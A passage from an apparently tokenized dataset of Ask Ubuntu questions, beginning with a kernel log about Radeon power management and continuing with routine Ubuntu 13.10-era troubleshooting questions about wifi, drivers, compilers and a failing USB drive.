1024m 0x0000000080000000 - 0x00000000bfffffff [ 6.203294 ] [ drm ] detected vram ram=2048m , bar=256m [ 6.203296 ] [ drm ] ram width 128bits ddr [ 6.203354 ] [ ttm ] zone kernel : available graphics memory : 1973928 kib [ 6.203355 ] [ ttm ] initializing pool allocator [ 6.203358 ] [ ttm ] initializing dma pool allocator [ 6.203375 ] [ drm ] radeon : 2048m of vram memory ready [ 6.203377 ] [ drm ] radeon : 1024m of gtt memory ready . [ 6.205915 ] [ drm ] gart : num cpu pages 262144 , num gpu pages 262144 [ 6.207317 ] [ drm ] pcie gen 2 link speeds already enabled [ 6.208495 ] [ drm ] loading turks microcode [ 6.212072 ] [ drm ] pcie gart of 1024m enabled ( table at 0x0000000000273000 ) . [ 6.212190 ] radeon 0000:01:00.0 : wb enabled [ 6.212194 ] radeon 0000:01:00.0 : fence driver on ring 0 use gpu addr 0x0000000080000c00 and cpu addr 0xffff88003a5b0c00 [ 6.212196 ] radeon 0000:01:00.0 : fence driver on ring 3 use gpu addr 0x0000000080000c0c and cpu addr 0xffff88003a5b0c0c [ 6.212771 ] radeon 0000:01:00.0 : fence driver on ring 5 use gpu addr 0x0000000000072118 and cpu addr 0xffffc900218b2118 [ 6.212774 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 6.212776 ] [ drm ] driver supports precise vblank timestamp query . [ 6.212799 ] radeon 0000:01:00.0 : irq 48 for msi/msi-x [ 6.212818 ] radeon 0000:01:00.0 : radeon : using msi . [ 6.212875 ] [ drm ] radeon : irq initialized . [ 6.229425 ] [ drm ] ring test on 0 succeeded in 1 usecs [ 6.229484 ] [ drm ] ring test on 3 succeeded in 1 usecs [ 6.234447 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 6.234530 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 6.240528 ] usbcore : registered new interface driver uvcvideo [ 6.240544 ] usb video class driver ( 1.1.1 ) [ 6.415205 ] [ drm ] ring test on 5 succeeded in 1 usecs [ 6.415210 ] [ drm ] uvd initialized successfully . [ 6.415466 ] [ drm ] enabling audio 0 support [ 6.415517 ] [ drm ] ib test on ring 0 succeeded in 0 usecs [ 6.415564 ] [ drm ] ib test on ring 3 succeeded in 0 usecs [ 6.576121 ] [ drm ] ib test on ring 5 succeeded [ 6.576414 ] [ drm ] radeon display connectors [ 6.585516 ] [ drm ] internal thermal controller with fan control [ 6.585570 ] == power state 0 == [ 6.585573 ] ui class : none [ 6.585575 ] internal class : boot [ 6.585577 ] caps : [ 6.585579 ] uvd vclk : 0 dclk : 0 [ 6.585582 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585584 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585585 ] power level 2 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585587 ] status : c r b [ 6.585589 ] == power state 1 == [ 6.585590 ] ui class : performance [ 6.585591 ] internal class : none [ 6.585592 ] caps : [ 6.585593 ] uvd vclk : 0 dclk : 0 [ 6.585594 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585595 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.585596 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.585597 ] status : [ 6.585598 ] == power state 2 == [ 6.585599 ] ui class : none [ 6.585600 ] internal class : uvd [ 6.585601 ] caps : video [ 6.585603 ] uvd vclk : 70000 dclk : 56000 [ 6.585604 ] power level 0 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.585605 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.585606 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.585607 ] status : [ 6.585608 ] == power state 3 == [ 6.585609 ] ui class : battery [ 6.585610 ] internal class : none [ 6.585611 ] caps : [ 6.585612 ] uvd vclk : 0 dclk : 0 [ 6.585613 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585614 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.585615 ] power level 2 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 6.585616 ] status : [ 6.585617 ] == power state 4 == [ 6.585618 ] ui class : battery [ 6.585619 ] internal class : uvd_hd [ 6.585620 ] caps : video [ 6.585622 ] uvd vclk : 40000 dclk : 30000 [ 6.585623 ] power level 0 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 6.585633 ] power level 1 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 6.585634 ] power level 2 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 6.585634 ] status : [ 6.585635 ] == power state 5 == [ 6.585636 ] ui class : none [ 6.585637 ] internal class : ulv [ 6.585638 ] caps : [ 6.585639 ] uvd vclk : 0 dclk : 0 [ 6.585640 ] power level 0 sclk : 30000 mclk : 15000 vddc : 875 vddci : 0 [ 6.585641 ] power level 1 sclk : 30000 mclk : 15000 vddc : 875 vddci : 0 [ 6.585642 ] power level 2 sclk : 30000 mclk : 15000 vddc : 875 vddci : 0 [ 6.585643 ] status : [ 6.985947 ] switching from power state : [ 6.985954 ] ui class : none [ 6.985957 ] internal class : boot [ 6.985961 ] caps : [ 6.985966 ] uvd vclk : 0 dclk : 0 [ 6.986003 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.986005 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.986006 ] power level 2 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.986007 ] status : c b [ 6.986010 ] switching to power state : [ 6.986011 ] ui class : performance [ 6.986012 ] internal class : none [ 6.986013 ] caps : [ 6.986014 ] uvd vclk : 0 dclk : 0 [ 6.986016 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 6.986017 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.986018 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 6.986019 ] status : r [ 6.986996 ] [ drm ] radeon : dpm initialized [ 6.991456 ] radeon 0000:01:00.0 : no connectors reported connected with modes [ 6.991461 ] [ drm ] can not find any crtc or sizes - going 1024x768 [ 6.992728 ] [ drm ] fb mappable at 0x40474000 [ 6.992730 ] [ drm ] vram apper at 0x40000000 [ 6.992732 ] [ drm ] size 3145728 [ 6.992734 ] [ drm ] fb depth is 24 [ 6.992735 ] [ drm ] pitch is 4096 [ 6.992837 ] radeon 0000:01:00.0 : fb1 : radeondrmfb frame buffer device [ 6.992851 ] [ drm ] initialized radeon 2.34.0 20080528 for 0000:01:00.0 on minor 1 [ 7.230973 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 7.270454 ] init : failsafe main process ( 821 ) killed by term signal [ 7.338196 ] type=1400 audit ( 1388166599.383:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=916 comm= '' apparmor_parser '' [ 7.338205 ] type=1400 audit ( 1388166599.383:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=916 comm= '' apparmor_parser '' [ 7.338211 ] type=1400 audit ( 1388166599.383:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=916 comm= '' apparmor_parser '' [ 7.338827 ] type=1400 audit ( 1388166599.383:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=916 comm= '' apparmor_parser '' [ 7.338833 ] type=1400 audit ( 1388166599.383:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=916 comm= '' apparmor_parser '' [ 7.339153 ] type=1400 audit ( 1388166599.383:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=916 comm= '' apparmor_parser '' [ 7.345124 ] type=1400 audit ( 1388166599.387:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=913 comm= '' apparmor_parser '' [ 7.345130 ] type=1400 audit ( 1388166599.387:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' chromium_browser '' pid=913 comm= '' apparmor_parser '' [ 7.345604 ] type=1400 audit ( 1388166599.387:16 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' chromium_browser '' pid=913 comm= '' apparmor_parser '' [ 7.345708 ] type=1400 audit ( 1388166599.391:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-uccsconfigure/uccsconfigure-session-wrapper '' pid=915 comm= '' apparmor_parser '' [ 7.360095 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 7.360099 ] bluetooth : bnep filters : protocol multicast [ 7.360109 ] bluetooth : bnep socket layer initialized [ 7.370237 ] bluetooth : rfcomm tty layer initialized [ 7.370252 ] bluetooth : rfcomm socket layer initialized [ 7.370254 ] bluetooth : rfcomm ver 1.11 [ 7.401857 ] init : avahi-cups-reload main process ( 944 ) terminated with status 1 [ 7.404797 ] ppdev : user-space parallel port driver [ 7.568712 ] r8169 0000:07:00.2 eth0 : link down [ 7.568750 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 7.689798 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) [ 7.689822 ] brcmsmac bcma0:0 : brcms_ops_config : change power-save mode : false ( implement ) [ 7.690450 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 9.075499 ] non-volatile memory driver v1.3 [ 9.121227 ] acpi_call : module verification failed : signature and/or required key missing - tainting kernel [ 9.150808 ] acpi_call : can not get handle : error : ae_not_found [ 9.272230 ] switching from power state : [ 9.272234 ] ui class : performance [ 9.272236 ] internal class : none [ 9.272238 ] caps : [ 9.272239 ] uvd vclk : 0 dclk : 0 [ 9.272241 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 9.272242 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 9.272244 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 9.272244 ] status : c [ 9.272246 ] switching to power state : [ 9.272247 ] ui class : battery [ 9.272248 ] internal class : none [ 9.272249 ] caps : [ 9.272250 ] uvd vclk : 0 dclk : 0 [ 9.272251 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 9.272253 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 9.272254 ] power level 2 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 9.272254 ] status : r [ 9.447387 ] wlan0 : authenticate with 80:3f:5d:92:2d : c4 [ 9.454616 ] wlan0 : send auth to 80:3f:5d:92:2d : c4 ( try 1/3 ) [ 9.457528 ] wlan0 : authenticated [ 9.459027 ] wlan0 : associate with 80:3f:5d:92:2d : c4 ( try 1/3 ) [ 9.462616 ] wlan0 : rx assocresp from 80:3f:5d:92:2d : c4 ( capab=0x401 status=0 aid=12 ) [ 9.463199 ] brcmsmac bcma0:0 : brcmsmac : brcms_ops_bss_info_changed : associated [ 9.463204 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 9.463216 ] wlan0 : associated [ 9.463768 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 10.788379 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : arp filtering : 1 addresses ( implement ) [ 17.575181 ] fat-fs ( mmcblk0p1 ) : volume was not properly unmounted . some data may be corrupt . please run fsck . [ 29.167655 ] acpi : failed to switch the brightness [ 29.339664 ] acpi : failed to switch the brightness [ 29.543114 ] acpi : failed to switch the brightness [ 29.736945 ] acpi : failed to switch the brightness [ 29.917835 ] acpi : failed to switch the brightness [ 30.080199 ] acpi : failed to switch the brightness [ 30.246275 ] acpi : failed to switch the brightness [ 30.421772 ] acpi : failed to switch the brightness [ 30.604742 ] acpi : failed to switch the brightness [ 30.775872 ] acpi : failed to switch the brightness [ 30.981853 ] acpi : failed to switch the brightness [ 31.184349 ] acpi : failed to switch the brightness [ 69.465961 ] init : plymouth-stop pre-start process ( 2622 ) terminated with status 1 [ 363.723699 ] wlan0 : deauthenticating from 80:3f:5d:92:2d : c4 by local choice ( reason=3 ) [ 363.724987 ] brcmsmac bcma0:0 : brcmsmac : brcms_ops_bss_info_changed : disassociated [ 363.724993 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : arp filtering : 1 addresses ( implement ) [ 363.724994 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) [ 363.726448 ] cfg80211 : calling crda to update world regulatory domain [ 363.728465 ] cfg80211 : world regulatory domain updated : [ 363.728468 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 363.728470 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 363.728471 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 363.728472 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 363.728474 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 363.728475 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 363.990439 ] switching from power state : [ 363.990442 ] ui class : battery [ 363.990444 ] internal class : none [ 363.990446 ] caps : [ 363.990447 ] uvd vclk : 0 dclk : 0 [ 363.990449 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 363.990450 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 363.990452 ] power level 2 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 363.990452 ] status : c [ 363.990454 ] switching to power state : [ 363.990455 ] ui class : performance [ 363.990456 ] internal class : none [ 363.990457 ] caps : [ 363.990458 ] uvd vclk : 0 dclk : 0 [ 363.990460 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 363.990461 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 363.990462 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 363.990463 ] status : r [ 364.144675 ] pm : syncing filesystems ... done . [ 364.156740 ] pm : preparing system for mem sleep [ 364.423010 ] mmc0 : card 59b4 removed [ 364.427918 ] freezing user space processes ... ( elapsed 0.002 seconds ) done . [ 364.430366 ] freezing remaining freezable tasks ... ( elapsed 0.001 seconds ) done . [ 364.431602 ] pm : entering mem sleep [ 364.431655 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 364.431967 ] sd 1:0:0:0 : [ sdb ] synchronizing scsi cache [ 364.432019 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 364.432146 ] sd 0:0:0:0 : [ sda ] stopping disk [ 364.432978 ] sd 1:0:0:0 : [ sdb ] stopping disk [ 364.592647 ] mei_me 0000:00:16.0 : suspend [ 364.690615 ] [ drm ] disabling audio 0 support [ 365.106840 ] pm : suspend of devices complete after 674.755 msecs [ 365.106986 ] pm : late suspend of devices complete after 0.144 msecs [ 365.138700 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi [ 365.154724 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi [ 365.186634 ] xhci_hcd 0000:00:14.0 : system wakeup enabled by acpi [ 365.202633 ] pm : noirq suspend of devices complete after 95.601 msecs [ 365.202855 ] acpi : preparing to enter system sleep state s3 [ 365.203172 ] pm : saving platform nvs memory [ 365.203856 ] disabling non-boot cpus ... [ 365.306638 ] smpboot : cpu 1 is now offline [ 365.410683 ] smpboot : cpu 2 is now offline [ 365.411050 ] broke affinity for irq 16 [ 365.411060 ] broke affinity for irq 17 [ 365.411076 ] broke affinity for irq 23 [ 365.411078 ] broke affinity for irq 41 [ 365.514746 ] smpboot : cpu 3 is now offline [ 365.516226 ] acpi : low-level resume complete [ 365.516279 ] pm : restoring platform nvs memory [ 365.516804 ] enabling non-boot cpus ... [ 365.516847 ] smpboot : booting node 0 processor 1 apic 0x1 [ 365.547691 ] intel pstate controlling : cpu 1 [ 365.547758 ] cpu1 is up [ 365.547778 ] smpboot : booting node 0 processor 2 apic 0x2 [ 365.561585 ] intel pstate controlling : cpu 2 [ 365.561631 ] cpu2 is up [ 365.561652 ] smpboot : booting node 0 processor 3 apic 0x3 [ 365.575466 ] intel pstate controlling : cpu 3 [ 365.575511 ] cpu3 is up [ 365.580112 ] acpi : waking up from system sleep state s3 [ 365.612729 ] xhci_hcd 0000:00:14.0 : system wakeup disabled by acpi [ 365.644687 ] ehci-pci 0000:00:1a.0 : system wakeup disabled by acpi [ 365.676712 ] ehci-pci 0000:00:1d.0 : system wakeup disabled by acpi [ 365.756849 ] pm : noirq resume of devices complete after 175.772 msecs [ 365.757041 ] pm : early resume of devices complete after 0.159 msecs [ 365.757086 ] i915 0000:00:02.0 : setting latency timer to 64 [ 365.757104 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 365.757134 ] mei_me 0000:00:16.0 : irq 45 for msi/msi-x [ 365.757203 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 365.761348 ] ehci-pci 0000:00:1a.0 : setting latency timer to 64 [ 365.762465 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 365.762655 ] ehci-pci 0000:00:1d.0 : setting latency timer to 64 [ 365.764202 ] [ drm ] pcie gen 2 link speeds already enabled [ 365.769174 ] [ drm ] pcie gart of 1024m enabled ( table at 0x0000000000273000 ) . [ 365.769269 ] radeon 0000:01:00.0 : wb enabled [ 365.769272 ] radeon 0000:01:00.0 : fence driver on ring 0 use gpu addr 0x0000000080000c00 and cpu addr 0xffff88003a5b0c00 [ 365.769275 ] radeon 0000:01:00.0 : fence driver on ring 3 use gpu addr 0x0000000080000c0c and cpu addr 0xffff88003a5b0c0c [ 365.769825 ] radeon 0000:01:00.0 : fence driver on ring 5 use gpu addr 0x0000000000072118 and cpu addr 0xffffc900218b2118 [ 365.786042 ] [ drm ] ring test on 0 succeeded in 1 usecs [ 365.786100 ] [ drm ] ring test on 3 succeeded in 1 usecs [ 365.971838 ] [ drm ] ring test on 5 succeeded in 1 usecs [ 365.971841 ] [ drm ] uvd initialized successfully . [ 365.971843 ] [ drm ] enabling audio 0 support [ 365.971892 ] [ drm ] ib test on ring 0 succeeded in 0 usecs [ 365.971944 ] [ drm ] ib test on ring 3 succeeded in 1 usecs [ 365.972902 ] usb 1-1.2 : reset full-speed usb device number 4 using ehci-pci [ 366.080842 ] ata2 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 366.081588 ] ata2.00 : configured for udma/100 [ 366.096850 ] sd 1:0:0:0 : [ sdb ] starting disk [ 366.122621 ] [ drm ] ib test on ring 5 succeeded [ 366.137029 ] usb 1-1.1 : reset high-speed usb device number 3 using ehci-pci [ 366.322100 ] switching from power state : [ 366.322102 ] ui class : none [ 366.322103 ] internal class : boot [ 366.322104 ] caps : [ 366.322106 ] uvd vclk : 0 dclk : 0 [ 366.322107 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 366.322108 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 366.322109 ] power level 2 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 366.322110 ] status : c b [ 366.322110 ] switching to power state : [ 366.322111 ] ui class : performance [ 366.322111 ] internal class : none [ 366.322112 ] caps : [ 366.322112 ] uvd vclk : 0 dclk : 0 [ 366.322113 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 366.322114 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 366.322114 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 366.322115 ] status : r [ 366.489252 ] usb 3-2 : reset low-speed usb device number 2 using xhci_hcd [ 366.507402 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801b5259c80 [ 366.507417 ] usb 3-2 : ep 0x82 - rounding interval to 64 microframes , ep desc says 80 microframes [ 366.969584 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 367.985715 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 367.992040 ] ata1.00 : configured for udma/100 [ 368.011952 ] sd 0:0:0:0 : [ sda ] starting disk [ 368.442234 ] pm : resume of devices complete after 2683.949 msecs [ 368.442604 ] pm : finishing wakeup . [ 368.442698 ] rtsx_pci 0000:07:00.0 : no hotplug settings from platform [ 368.442727 ] r8169 0000:07:00.2 : no hotplug settings from platform [ 368.442824 ] bcma-pci-bridge 0000:08:00.0 : no hotplug settings from platform [ 368.442607 ] restarting tasks ... done . [ 368.522219 ] video lnxvideo:00 : restoring backlight state [ 368.522224 ] video lnxvideo:02 : restoring backlight state [ 368.742528 ] switching from power state : [ 368.742531 ] ui class : performance [ 368.742533 ] internal class : none [ 368.742535 ] caps : [ 368.742536 ] uvd vclk : 0 dclk : 0 [ 368.742538 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 368.742539 ] power level 1 sclk : 50000 mclk : 90000 vddc : 1000 vddci : 0 [ 368.742541 ] power level 2 sclk : 60000 mclk : 90000 vddc : 1000 vddci : 0 [ 368.742541 ] status : c [ 368.742543 ] switching to power state : [ 368.742544 ] ui class : battery [ 368.742545 ] internal class : none [ 368.742546 ] caps : [ 368.742547 ] uvd vclk : 0 dclk : 0 [ 368.742549 ] power level 0 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 368.742550 ] power level 1 sclk : 30000 mclk : 15000 vddc : 900 vddci : 0 [ 368.742551 ] power level 2 sclk : 40000 mclk : 40000 vddc : 900 vddci : 0 [ 368.742552 ] status : r [ 368.913053 ] r8169 0000:07:00.2 eth0 : link down [ 368.913110 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 369.029483 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) [ 369.029493 ] brcmsmac bcma0:0 : brcms_ops_config : change power-save mode : false ( implement ) [ 369.030129 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 369.185286 ] mmc0 : new high speed sdhc card at address 59b4 [ 369.185401 ] mmcblk0 : mmc0:59b4 sdc 29.4 gib [ 369.186732 ] mmcblk0 : p1 [ 370.755660 ] wlan0 : authenticate with 80:3f:5d:92:2d : c4 [ 370.758962 ] wlan0 : send auth to 80:3f:5d:92:2d : c4 ( try 1/3 ) [ 370.765651 ] wlan0 : authenticated [ 370.767009 ] wlan0 : associate with 80:3f:5d:92:2d : c4 ( try 1/3 ) [ 370.770861 ] wlan0 : rx assocresp from 80:3f:5d:92:2d : c4 ( capab=0x401 status=0 aid=12 ) [ 370.771467 ] brcmsmac bcma0:0 : brcmsmac : brcms_ops_bss_info_changed : associated [ 370.771476 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 370.771494 ] wlan0 : associated [ 370.771509 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 371.424544 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : arp filtering : 1 addresses ( implement ) [ 373.847313 ] fat-fs ( mmcblk0p1 ) : volume was not properly unmounted . some data may be corrupt . please run fsck . krishna @ krishna-hp-envy-4-notebook-pc : ~ $ i have checked the opensource installation process from ubuntu guides and still no change in what i have done either . i am not sure if i am missing something here , but i would like to use opensource driver with dpm . ( i also enabled dpm in grub with radeon.dpm = 1 ) any help here is greatly appreciated .
396468	window does not maximize correctly	when i try to maximize any window like firefox in the image below as you can see there 's a margin where you can see the wallpaper.. that 's not supposed to happen because its maximized.. any tip to solve this . thanks in advance . i have tried to change resolution settings , but still the same
396469	can bootchart be configured to save only current log ?	i found over a gigabyte of files in var/log/bootchart . i do n't want any but the most recent file to be saved . can this be done ?
396470	xkill keyboard shortcut does not work on ubuntu 13.10	i am at the end of my tether with ubuntu at this stage . i create a simple shortcut under keyboard 'ctrl + k ' for xkill . i hit ctrl + k ... .. nothing happens . i open a terminal , type in xkill and it works fine . running ubuntu 13.10 saucy and fglrx beta drivers . other keyboard shortcuts like logout work fine .
396473	error with libz.so.1 on android studio	it 's the first time that i open a project in android studio , and the first error that i get is the following : execution failed for task ' : app : mergedebugresources ' . error : failed to run command : /home/giacomotb/programs/android-studio/sdk/build-tools/android-4.4/aapt s -i /home/giacomotb/androidstudioprojects/provadbcinema/app/build/exploded-bundles/comandroidsupportappcompatv71900.aar/res/drawable-hdpi/abc_list_selector_disabled_holo_light.9.png -o /home/giacomotb/androidstudioprojects/provadbcinema/app/build/res/all/debug/drawable-hdpi/abc_list_selector_disabled_holo_light.9.png **error code:127** output : /home/giacomotb/programs/android-studio/sdk/build-tools/android-4.4/aapt : error while loading shared libraries : **libz.so.1 : can not open shared object file : no such file or directory** i tried to do this commands : apt-get install lib32ncurses5 lib32stdc++6 that goes well and that one : sudo apt-get update sudo apt-get install ia32-libs that says : reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate i ca n't find other solution on the web . what should i do ? i use ubuntu 13.10 x64
396475	ubuntu can see the wifi connection but does n't connect	i have an asus x5dinseries laptop and i installed ubuntu 13.10 on it . everything works except for the wifi : i can see the wifi networks but i can not connect to my wifi . it keeps asking me for the password , which i enter . for the reccord , the wifi works fine on the same laptop with windows 8 . what could i do ?
396476	`` undefined reference to `std : :ios_base : :init : :init ( ) '' while compiling a hello world in netbeans	i am new to ubuntu and i want to code in c++ . i intalled g++ through software manager and after i installed netbeans to have a nice ide to code in c++ . then i write this simple code : # include < iostream > //using namespace std ; int main ( int argc , char**argv ) { // prints welcome message ... std : : cout < < `` welcome ... '' < < std : :endl ; // prints arguments ... if ( argc > 1 ) { std : :cout < < std : :endl < < `` arguments : '' < < std : :endl ; for ( int i = 1 ; i < argc ; i++ ) { std : :cout < < i < < `` : `` < < argv [ i ] < < std : :endl ; } } return 0 ; } when i built the code i got this error : /usr/include/c++/4.8/iostream:74 : undefined reference to `std : :ios_base : :init : :init ( ) ' this meaning that is n't my code in error bu it seems that iostream refer something that is unknown . now , my question is : how i can check if gcc and g++ are installed correctly ? and , if it is installed well , why g++ does n't compile ?
396477	which update to avoid in order to work properly my broadcom wifi ( ubuntu 12.04 ?	i just bought a inspiron 3537 laptop , and i have the problem with a wireless card ( broadcom ) so i reinstalled ubuntu 12.04 , and it asks me which updates to do ? which one do i exclude ? ?
396480	cannont mount/format usb pendrive	yesterday , while i was working on several files stored in my usb , suddenly , it was not recognized by the system . it is shown at disk utility as 'generic usb mass storage ' , but i can not format it . gparted does n't show it . i have been reading forum a day and a half . even i have try it in windows , but i can not format it ( one of the apps i installed to recover data , identified the raw filesystem on my usb ) . i do n't know what more can i do . if it would be possible , i would like to recover all the files form my usb but i know it will be difficult . in order to describe the problem , i show you the results i get with some commands : ls /dev/sd # my usb is /dev/sdb* /dev/sda /dev/sda3 /dev/sda5 /dev/sda7 /dev/sdb /dev/sda2 /dev/sda4 /dev/sda6 /dev/sda8 /dev/sdc sudo fdisk /dev/sdb fdisk : unable to read /dev/sdb : invalid argument ls -al /dev/sdb brw-rw -- -- 1 root disk 8 , 16 abe 27 17:34 /dev/sdb dmesg | grep sdb * # this is not the full text i get from dmesg , but i think read capacity failed y unabled to read superblock are the most important parts of it* [ 51.274309 ] sd 4:0:0:0 : [ sdb ] read capacity failed [ 51.274314 ] sd 4:0:0:0 : [ sdb ] result : hostbyte=did_ok driverbyte=driver_sense [ 51.274321 ] sd 4:0:0:0 : [ sdb ] sense key : unit attention [ current ] [ 51.274328 ] sd 4:0:0:0 : [ sdb ] add . sense : not ready to ready change , medium may have changed [ 51.274836 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 51.274843 ] sd 4:0:0:0 : [ sdb ] mode sense : 45 00 00 00 [ 51.275491 ] sd 4:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 51.279727 ] sd 4:0:0:0 : [ sdb ] read capacity failed [ 51.279733 ] sd 4:0:0:0 : [ sdb ] result : hostbyte=did_ok driverbyte=driver_sense [ 51.279739 ] sd 4:0:0:0 : [ sdb ] sense key : unit attention [ current ] [ 51.279745 ] sd 4:0:0:0 : [ sdb ] add . sense : not ready to ready change , medium may have changed [ 51.281542 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk [ 1156.511131 ] sd 4:0:0:0 : [ sdb ] read capacity failed [ 1156.511137 ] sd 4:0:0:0 : [ sdb ] result : hostbyte=did_ok driverbyte=driver_sense [ 1156.511141 ] sd 4:0:0:0 : [ sdb ] sense key : unit attention [ current ] [ 1156.511146 ] sd 4:0:0:0 : [ sdb ] add . sense : not ready to ready change , medium may have changed [ 2805.807311 ] ext4-fs ( sdb ) : unable to read superblock [ 2940.783288 ] fat-fs ( sdb ) : unable to read boot sector [ 3560.267178 